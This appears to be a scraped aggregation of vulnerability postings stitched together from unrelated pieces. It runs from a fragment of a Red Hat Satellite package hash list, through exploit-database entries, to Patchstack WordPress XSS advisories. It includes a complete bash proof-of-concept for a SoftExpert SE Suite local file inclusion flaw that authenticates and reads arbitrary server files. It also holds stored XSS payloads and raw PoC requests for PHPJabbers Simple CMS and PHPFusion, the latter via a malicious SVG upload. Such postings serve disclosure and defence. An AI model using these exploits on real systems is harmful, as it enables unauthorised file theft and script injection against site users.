0db4345b2dbd69c4f0e534211c0cdb0e9ebcbbbdee0cd05c9eea247d5c3082dc rubygem-unicode-display\_width-1.8.0-1.el8sat.noarch.rpm SHA-256: 0db4345b2dbd69c4f0e534211c0cdb0e9ebcbbbdee0cd05c9eea247d5c3082dc rubygem-version\_gem-1.1.1-1.el8sat.noarch.rpm SHA-256: d3ce4d3541e4eee5113a123c6da4469b9d752c33d8487d97ae5c0cdb5c8fadbf rubygem-version\_gem-1.1.1-1.el8sat.noarch.rpm SHA-256: d3ce4d3541e4eee5113a123c6da4469b9d752c33d8487d97ae5c0cdb5c8fadbf satellite-cli-6.13.0-6.el8sat.noarch.rpm SHA-256: f2dfcb79849c6aa11f36192e11f008b785dcbc2f32e9622ae0421eda6ad16309 satellite-cli-6.13.0-6.el8sat.noarch.rpm SHA-256: f2dfcb79849c6aa11f36192e11f008b785dcbc2f32e9622ae0421eda6ad16309 satellite-clone-3.3.0-1.el8sat.noarch.rpm SHA-256: b8a48dee2b7182ab7cdce4ac97160be6bc3e1d8447f9cbfd3b7e445fe3cee0e7 satellite-maintain-0.0.1-1.el8sat.noarch.rpm SHA-256: 7441463a0893ce255708ee6f88e484b4a1ad1895a58cf1b8256d9014894d2db8

RHSA-2023:2097: Red Hat Security Advisory: Satellite 6.13 Release

SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.

    # Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion# Date: 27-04-2023# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.softexpert.com/# Version: 2.0 < 2.1.3# Tested on: Kali Linux# CVE : CVE-2023-30330# SE Suite versions tested: 2.0.15.31, 2.0.15.115# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330#!/bin/bash# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1u=$2p=$3file=$(echo -n "$4"|base64 -w 0)end="\033[0m\e[0m"red="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"echo -e "\n$4 : $file\n"echo -e "${blue}\nGETTING SESSION COOKIE${end}"cookie=$(curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)echo "cookie: $cookie"function LFI () {curl -s -k -X $'POST' \    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"}echo -e "${blue}\nExploiting LFI:${end}"LFIfunction logout () {curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \    "https://$target/softexpert/selogout"}echo -e "${blue}\nLogging out${end}"logout >/dev/nullecho -e "\n\nDone!"

SoftExpert Suite 2.1.3 Local File Inclusion

PHPJabbers Simple CMS version 5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Steps to Reproduce ###- Please login from this address:https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin- Click on the "Add Section" button.- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the"Section" box and save it.- Boom! An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreateHTTP/1.1Host: localhostCookie: pj_sid=PJ1.0.6199026527.1682777172;pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;pjd=7l9bb4ubmknrdbns46j7g5cqn7User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 371Origin: https://localhostReferer:https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closesection_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T

PHPJabbers Simple CMS 5.0 Cross Site Scripting

PHPFusion version 9.10.30 suffers from a persistent cross site scripting vulnerability.

Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)  
Application: PHPFusion  
Version: 9.10.30  
Bugs:  XSS  
Technology: PHP  
Vendor URL: https://www.php-fusion.co.uk/home.php  
Software Link: https://sourceforge.net/projects/php-fusion/  
Date of found: 28-04-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)  
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>

poc request:

POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1  
Host: localhost  
Content-Length: 1198  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0  
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="reqid"

187c77be8e52cf  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="cmd"

upload  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="target"

l1_Lw  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="mtime[]"

1681116842  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="overwrite"

0  
------WebKitFormBoundaryxF2jB690PpLWInAA--

3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(  
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)

poc video : https://youtu.be/6yBLnRH8pOY

PHPFusion 9.10.30 Cross Site Scripting

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Moris Dov Stock market charts from finviz plugin <= 1.0.1 versions.

**Solution**

Deactivate and delete. No fix is available. The vulnerability was reported to the WordPress plugins team on Jan 19, 2023.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Stock market charts from finviz Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23809: WordPress Stock market charts from finviz plugin <= 1.0.1 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in DgCult Exquisite PayPal Donation plugin <= v2.0.0 versions.

**Solution**

Deactivate and delete. No fix is available. The vulnerability was reported to the WordPress plugins team on Jan 19, 2023.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Exquisite PayPal Donation Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23785: WordPress Exquisite PayPal Donation plugin <= v2.0.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Sergey Panasenko Sponsors Carousel plugin <= 4.02 versions.

**Solution**

Deactivate and delete. No fix is available. The vulnerability was reported to the WordPress plugins team on Jan 19, 2023.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Sponsors Carousel Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23808: WordPress Sponsors Carousel plugin <= 4.02 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in WP Table Builder plugin <= 1.4.6 versions.

**Solution**

Update the WordPress WP Table Builder – WordPress Table Plugin plugin to the latest available version (at least 1.4.7).

Muhammad Daffa discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Table Builder – WordPress Table Plugin Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.4.7.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-46852: WordPress WP Table Builder – WordPress Table Plugin plugin <= 1.4.6 - Cross Site Scripting (XSS) - Patchstack


Multiple reflected cross-site scripting (XSS) vulnerabilities exist in undisclosed pages of the BIG-IP Configuration utility which allow an attacker to run JavaScript in the context of the currently logged-in user.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Loading

×Sorry to interrupt

CSS Error

Refresh

Tag

#xss